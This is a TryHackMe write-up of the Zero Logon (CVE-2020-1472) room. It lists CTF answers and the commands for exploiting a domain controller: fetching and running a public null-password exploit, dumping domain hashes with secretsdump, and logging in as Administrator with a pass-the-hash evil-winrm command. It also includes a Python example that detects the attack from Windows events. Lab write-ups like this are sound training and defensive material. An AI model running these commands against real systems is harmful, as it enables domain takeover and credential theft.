This is the write-up for the room Zero Logon on TryHackMe; it is part of the TryHackMe Cyber Defense path.
Connect to the TryHackMe lab environment through the VPN, or use the AttackBox on the TryHackMe site.
TASK Zero Logon
Task 1
Read everything in the task and press complete.
- Tom Tervoort of Secura – https://www.secura.com/pathtoimg.php?id=2055
- Microsoft – https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/7b9e31d1-670e-4fc5-ad54-9ffff50755f9
- Microsoft – https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/3a9ed16f-8014-45ae-80af-c0ecb06e2db9
Task 2
Install Impacket, if it is not already installed, using the commands below:
python3 -m pip install virtualenv
python3 -m virtualenv impacketEnv
source impacketEnv/bin/activate
pip install git+https://github.com/SecureAuthCorp/impacket
Task 3
Open a terminal, navigate to the download directory and enter the following command to get the PoC file:
wget https://raw.githubusercontent.com/SecuraBV/CVE-2020-1472/master/zerologon_tester.py
3.1 What method will allow us to change Passwords over NRPC?
You can find this in the picture in task 1.
Answer: NetrServerPasswordSet2
3.2 What are the required fields for the method per the Microsoft Documentation?
Documentation can be found here: [MS-NRPC]: NetrServerPasswordSet2 (Opnum 30) | Microsoft Docs
Answer: PrimaryName, AccountName, SecureChannelType, ComputerName, Authenticator, ReturnAuthenticator, ClearNewPassword
3.3 What Opnumber is the Method?
Answer: 30
Task 4
Start the machine attached to this task.
First we get the correct Python script:
wget https://raw.githubusercontent.com/Sq00ky/Zero-Logon-Exploit/master/zeroLogon-NullPass.py
4.1 What is the NetBIOS name of the Domain Controller?
Type in the following command to run an nmap scan:
nmap -sC -sV 10.10.89.129
Answer: DC01
4.2 What is the NetBIOS domain name of the network?
Answer: HOLOLIVE
4.3 What domain are you attacking?
Answer: Hololive.local
4.4 What is the Local Administrator’s NTLM hash?
Make sure you have followed along with task 2 so that Impacket is installed in a virtual environment.
Run the following command to exploit the domain controller:
python3 zeroLogon-NullPass.py DC01 MACHINE_IP
Now we can dump the secrets by typing in the following command:
secretsdump.py -just-dc -no-pass DC01\$@MACHINE_IP
The answer is the highlighted hash in the output.
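The exploit and dump above leave traces on the domain controller that a defender can look for. The following is an added example, not part of the room or of the PoC scripts: it triages constructed Windows Security events for an EventID 4742 (computer account changed) raised by ANONYMOUS LOGON against a machine account, which is what the unauthenticated NetrServerPasswordSet2 reset produces, and for the Netlogon events 5827-5829 that a patched DC logs for secure channels negotiated without RPC signing and sealing. The event dicts and their flattened field names are an assumption made for the example.

```python
# Added detection example (not part of the TryHackMe room or the PoC scripts).
# Field names are a simplified flattening of the Security event XML; the
# events themselves are constructed, not captured from the lab DC.

ANONYMOUS_LOGON_SID = "S-1-5-7"
VULNERABLE_NETLOGON_EVENTS = {5827, 5828, 5829}

# Constructed sample events (assumption: one dict per event, fields flattened).
SAMPLE_EVENTS = [
    {"EventID": 4742, "SubjectUserSid": "S-1-5-21-10-20-30-1105",
     "SubjectUserName": "svc-join", "TargetUserName": "WS07$"},
    {"EventID": 4742, "SubjectUserSid": ANONYMOUS_LOGON_SID,
     "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "DC01$"},
    {"EventID": 5829, "SamAccountName": "WS07$"},
    {"EventID": 4624, "SubjectUserSid": ANONYMOUS_LOGON_SID,
     "TargetUserName": "ANONYMOUS LOGON", "LogonType": 3},
]


def is_anonymous_machine_account_change(event):
    """4742 from ANONYMOUS LOGON against a '$' (machine) account: the
    password reset done through NetrServerPasswordSet2 without a credential."""
    return (event.get("EventID") == 4742
            and event.get("SubjectUserSid") == ANONYMOUS_LOGON_SID
            and str(event.get("TargetUserName", "")).endswith("$"))


def is_vulnerable_netlogon_channel(event):
    """5827/5828: vulnerable connection denied; 5829: allowed while
    enforcement is deferred. All three mean Netlogon without signing."""
    return event.get("EventID") in VULNERABLE_NETLOGON_EVENTS


def triage(events):
    """Return (finding, account) tuples in event order."""
    findings = []
    for event in events:
        if is_anonymous_machine_account_change(event):
            findings.append(("machine account password changed by ANONYMOUS LOGON",
                             event["TargetUserName"]))
        elif is_vulnerable_netlogon_channel(event):
            findings.append(("Netlogon secure channel without RPC signing/sealing",
                             event.get("SamAccountName", "unknown")))
    return findings


if __name__ == "__main__":
    for finding, account in triage(SAMPLE_EVENTS):
        print(f"{finding}: {account}")
```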
4.5 How many Domain Admin accounts are there?
Count all accounts whose names are prefixed with A-.
Answer: 2
4.6 What is the root flag?
We will do this with evil-winrm by typing the following command:
evil-winrm -i 10.10.89.129 -u Administrator -H <FOUND HASH IN PREVIOUS ANSWER>
As you can see in the screenshot, the flag is on the user's desktop in a file called root.txt. You can see its content with the command type.